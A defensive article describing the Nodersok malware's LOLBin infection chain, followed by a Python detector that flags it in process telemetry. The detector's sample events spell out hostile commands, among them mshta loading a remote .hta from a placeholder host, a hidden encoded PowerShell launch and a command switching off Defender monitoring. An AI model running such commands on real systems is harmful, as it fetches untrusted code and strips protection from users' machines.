Description Of Nodersok
Many cyber crooks have taken an interest in the hacking technique known as LOLBins (Living-Off-the-Land Binaries). It is becoming very popular these days because it allows cyber criminals to bypass anti-malware tools and carry out their threatening campaigns through legitimate services and applications, which also helps the operators remain under the radar. Malware researchers have recently spotted a new threat that employs LOLBin techniques at every phase of the attack, making Nodersok a threat that operates very silently.
The creators of the Nodersok threat use it to infect hosts and turn them into proxy servers by injecting them with a proxy script running on the Node.JS framework. It isn't very clear what exactly they plan on doing with the infiltrated machines, but it is likely that they are used as part of the fast-growing infrastructure of the creators of Nodersok or simply employed in huge spam email campaigns.
The activity of Nodersok is mainly concentrated in the United States and Europe. It has already been reported that the victims number in the thousands, which is rather impressive. Cyber security experts have estimated that nearly 3% of the infected hosts belong to corporations, which means that almost all of the computer systems that have fallen victim to the Nodersok malware belong to regular users.
The Nodersok threat executes a few tasks as part of its attack, such as:
- Corrupted ads deliver a “.hta” file, hosted on a genuine cloud service, to the user.
- Once the second file infiltrates the computer system, it begins a decryption process which unlocks a PowerShell command.
- The revealed PowerShell command enables the threat to plant additional LOLBins on the host.
If the Nodersok threat is successful and manages to download the extra LOLBins, the user is in real trouble. These tools include:
- The previously mentioned Node.JS framework.
- A module related to the Node.JS framework that allows the operators to turn the host into a dormant proxy server.
- A network packet capturing kit called WinDivert.
- A shellcode that allows the attackers to gain administrator privileges on the infected host.
- A PowerShell script that makes sure none of the Windows security tools are functioning as long as the Nodersok malware is present on the computer system.
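The stages listed above leave a recognisable parent/child process trail that a defender can hunt for. The following is an added example, not code from the original article: it walks constructed Sysmon-style process-creation events (the PIDs, paths and command lines are assumptions, not real telemetry) and flags the chain described here, mshta.exe running a remote .hta, spawning PowerShell, which in turn starts a node.exe proxy script and tampers with the built-in security tooling.

```python
"""Flag the Nodersok-style LOLBin chain (.hta -> PowerShell -> node.exe) in process telemetry."""
import re
from collections import namedtuple

Event = namedtuple("Event", "pid ppid image cmdline")

# Constructed sample events: one benign browser launch and one chain matching the stages above.
SAMPLE_EVENTS = [
    Event(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(200, 100, r"C:\Windows\System32\mshta.exe",
          "mshta.exe https://storage.example-cloud.invalid/ad/update.hta"),
    Event(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -NoP -W Hidden -EncodedCommand <encoded-command-placeholder>"),
    Event(400, 300, r"C:\Users\victim\AppData\Local\Temp\node.exe",
          r"node.exe C:\Users\victim\AppData\Local\Temp\proxy.js"),
    Event(500, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"),
    Event(600, 100, r"C:\Program Files\Mozilla Firefox\firefox.exe", "firefox.exe"),
]

def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

def ancestry(events, pid):
    """Image basenames from the process itself up to its root ancestor (cycle-safe)."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain

def detect(events):
    """Return (pid, finding) tuples for each stage of the described chain."""
    findings = []
    for e in events:
        chain = ancestry(events, e.pid)
        cmd = e.cmdline.lower()
        # Stage 1: the HTA host fetching a .hta over HTTP(S) from a remote (cloud) location.
        if basename(e.image) == "mshta.exe" and re.search(r"https?://\S+\.hta", cmd):
            findings.append((e.pid, "remote_hta_execution"))
        # Stage 2: the decrypted PowerShell command launched directly by mshta.exe.
        if chain[:2] == ["powershell.exe", "mshta.exe"]:
            findings.append((e.pid, "hta_spawned_powershell"))
        # Stage 3: the Node.JS proxy started by that PowerShell process.
        if chain[:3] == ["node.exe", "powershell.exe", "mshta.exe"]:
            findings.append((e.pid, "powershell_spawned_node_proxy"))
        # Stage 3 (side effect): Defender preferences being switched off from the chain.
        if "set-mppreference" in cmd and "disable" in cmd:
            findings.append((e.pid, "security_tooling_disabled"))
    return findings
```

Feeding real Sysmon Event ID 1 records into the same `Event` shape is enough to reuse `detect` unchanged.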
Ensure you download and install a reputable anti-virus software suite that will help you remove the Nodersok malware from your computer system safely.